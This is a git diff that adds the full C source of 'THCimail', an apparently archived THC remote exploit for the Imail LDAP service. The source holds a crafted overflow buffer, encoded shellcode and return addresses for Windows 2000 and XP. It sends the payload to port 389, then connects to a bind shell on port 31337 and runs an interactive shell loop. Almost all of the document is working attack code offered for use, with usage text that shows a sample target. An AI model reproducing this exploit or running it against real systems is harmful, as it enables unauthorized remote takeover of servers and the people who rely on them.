--- /dev/null
+/*****************************************************************************/\r
+/* THCimail 0.1 - Wind0wZ remote root exploit */\r
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */\r
+/* THC PUBLIC SOURCE MATERIALS */\r
+/* */\r
+/* Bug was found by idefense or some idefense slaves ;) */\r
+/* http://www.idefense.com/application/poi/display?id=74&type=vulnerabilities*/\r
+/* */\r
+/* compile with MS Visual C++ : cl THCimail.c */\r
+/* */\r
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */\r
+/* scut, stealth, FtR and Random */\r
+/*****************************************************************************/\r
+\r
+#include <stdio.h>\r
+#include <stdlib.h>\r
+#include <string.h>\r
+#include <winsock2.h>\r
+\r
+#pragma comment(lib, "ws2_32.lib")\r
+\r
+char *WIN2KEN = "\xc4\x2a\x02\x75";\r
+char *WIN2KPG = "\xc4\x2a\xf9\x74";\r
+char *WINXPSP1G = "\xfe\x63\xa1\x71";\r
+\r
+#define jumper "\xeb\x06\x4a\x43"\r
+\r
+char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";\r
+\r
+char shellcode[] =\r
+"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"\r
+"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"\r
+"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"\r
+"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"\r
+"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"\r
+"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"\r
+"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"\r
+"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"\r
+"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"\r
+"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"\r
+"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"\r
+"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"\r
+"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"\r
+"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"\r
+"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"\r
+"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"\r
+"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"\r
+"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"\r
+"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"\r
+"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"\r
+"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"\r
+"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"\r
+"\xda\x63\xe5\x70\x70\xda\x6f";\r
+\r
+\r
+void usage();\r
+void shell(int sock);\r
+\r
+int main(int argc, char *argv[])\r
+{ \r
+ unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;\r
+ unsigned char *finalbuffer,*crapbuf1,*crapbuf2;\r
+ unsigned int IMAIL6_7=60;\r
+ unsigned int IMAIL_8=68;\r
+\r
+ struct sockaddr_in mytcp;\r
+ struct hostent * hp;\r
+ WSADATA wsaData;\r
+\r
+ printf("\nTHCimail v0.1 - Imail LDAP exploit\n");\r
+ printf("tested on Imail 6-8\n");\r
+ printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");\r
+\r
+ if(argc<4 || argc>4)\r
+ usage();\r
+\r
+ ver = (unsigned short)atoi(argv[3]); \r
+ switch(ver)\r
+ {\r
+ case 0:\r
+ IMAILVER = IMAIL6_7;\r
+ break;\r
+ case 1:\r
+ IMAILVER = IMAIL_8;\r
+ break;\r
+ default:\r
+ printf("\nYou entered an illegal version !\n\n");\r
+ usage();\r
+ exit(-1);\r
+ }\r
+\r
+ crapbuf1 = malloc(IMAILVER);\r
+ memset(crapbuf1,'X',IMAILVER);\r
+\r
+ printf("imailver = %d\n",IMAILVER);\r
+\r
+ crapbuf2 = malloc(2220);\r
+ memset(crapbuf2,'X',2220);\r
+\r
+ finalbuffer = malloc(2650);\r
+ memset(finalbuffer,0,2650);\r
+\r
+ printf("\n[*] building buffer\n");\r
+\r
+ strcat(finalbuffer,ldapshit);\r
+\r
+ strcat(finalbuffer,crapbuf1);\r
+\r
+ strcat(finalbuffer,jumper);\r
+\r
+ os = (unsigned short)atoi(argv[2]); \r
+ switch(os)\r
+ {\r
+ case 0:\r
+ strcat(finalbuffer,WIN2KPG);\r
+ break;\r
+ case 1:\r
+ strcat(finalbuffer,WIN2KPG);\r
+ break;\r
+ case 2:\r
+ strcat(finalbuffer,WINXPSP1G);\r
+ break;\r
+ default:\r
+ printf("\nYou entered an illegal OS !\n\n");\r
+ usage();\r
+ exit(-1);\r
+ }\r
+\r
+ strcat(finalbuffer,shellcode);\r
+ strcat(finalbuffer,crapbuf2);\r
+ \r
+ if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)\r
+ {\r
+ printf("WSAStartup failed !\n");\r
+ exit(-1);\r
+ }\r
+ \r
+ hp = gethostbyname(argv[1]);\r
+\r
+ if (!hp){\r
+ addr = inet_addr(argv[1]);\r
+ }\r
+ if ((!hp) && (addr == INADDR_NONE) )\r
+ {\r
+ printf("Unable to resolve %s\n",argv[1]);\r
+ exit(-1);\r
+ }\r
+\r
+ sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r
+ if (!sock)\r
+ { \r
+ printf("socket() error...\n");\r
+ exit(-1);\r
+ }\r
+ \r
+ if (hp != NULL)\r
+ memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);\r
+ else\r
+ mytcp.sin_addr.s_addr = addr;\r
+\r
+ if (hp)\r
+ mytcp.sin_family = hp->h_addrtype;\r
+ else\r
+ mytcp.sin_family = AF_INET;\r
+\r
+ mytcp.sin_port=htons(389);\r
+\r
+ printf("[*] connecting the target\n");\r
+\r
+ rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));\r
+ if(rc==0)\r
+ {\r
+ send(sock,finalbuffer,2650,0);\r
+ printf("[*] Exploit send successfully ! Sleeping a while ....\n");\r
+ Sleep(1000);\r
+ }\r
+ else\r
+ printf("\nCan't connect to ldap port!\n");\r
+ \r
+ if(rc==0)\r
+ {\r
+ printf("[*] Trying to get a shell\n\n");\r
+ sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r
+ mytcp.sin_port = htons(31337);\r
+ rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));\r
+ if(rc!=0)\r
+ {\r
+ printf("can't connect to port 31337 ;( maybe firewalled ...\n");\r
+ exit(-1);\r
+ }\r
+ shell(sock2);\r
+ }\r
+\r
+ shutdown(sock,1);\r
+ closesocket(sock);\r
+\r
+ free(crapbuf1);\r
+ free(crapbuf2);\r
+ free(finalbuffer); \r
+\r
+ exit(0);\r
+}\r
+ \r
+void usage()\r
+{\r
+ unsigned int a;\r
+ printf("\nUsage: <Host> <OS> <Imail Version>\n");\r
+ printf("Sample: THCimail 194.44.55.56 0 1\n\n");\r
+ printf("OS:\n");\r
+ printf("0 - Windows 2000 Server english all service packs\n");\r
+ printf("1 - Windows 2000 Professional german\n");\r
+ printf("2 - Windows XP SP1 german\n\n");\r
+ printf("Imail Version:\n");\r
+ printf("0 - Imail 6+7\n");\r
+ printf("1 - Imail 8\n");\r
+ exit(0);\r
+}\r
+\r
+void shell(int sock)\r
+{\r
+ int l;\r
+ char buf[1024];\r
+ struct timeval time;\r
+ unsigned long ul[2];\r
+\r
+ time.tv_sec = 1;\r
+ time.tv_usec = 0;\r
+\r
+ while (1)\r
+ {\r
+ ul[0] = 1;\r
+ ul[1] = sock;\r
+\r
+ l = select (0, (fd_set *)&ul, NULL, NULL, &time);\r
+ if(l == 1)\r
+ { \r
+ l = recv (sock, buf, sizeof (buf), 0);\r
+ if (l <= 0)\r
+ {\r
+ printf ("bye bye...\n");\r
+ return;\r
+ }\r
+ l = write (1, buf, l);\r
+ if (l <= 0)\r
+ {\r
+ printf ("bye bye...\n");\r
+ return;\r
+ }\r
+ }\r
+ else\r
+ {\r
+ l = read (0, buf, sizeof (buf));\r
+ if (l <= 0)\r
+ {\r
+ printf("bye bye...\n");\r
+ return;\r
+ }\r
+ l = send(sock, buf, l, 0);\r
+ if (l <= 0)\r
+ {\r
+ printf("bye bye...\n");\r
+ return;\r
+ }\r
+ }\r
+ }\r
+}\r
projects / oweals / thc-archive.git / blobdiff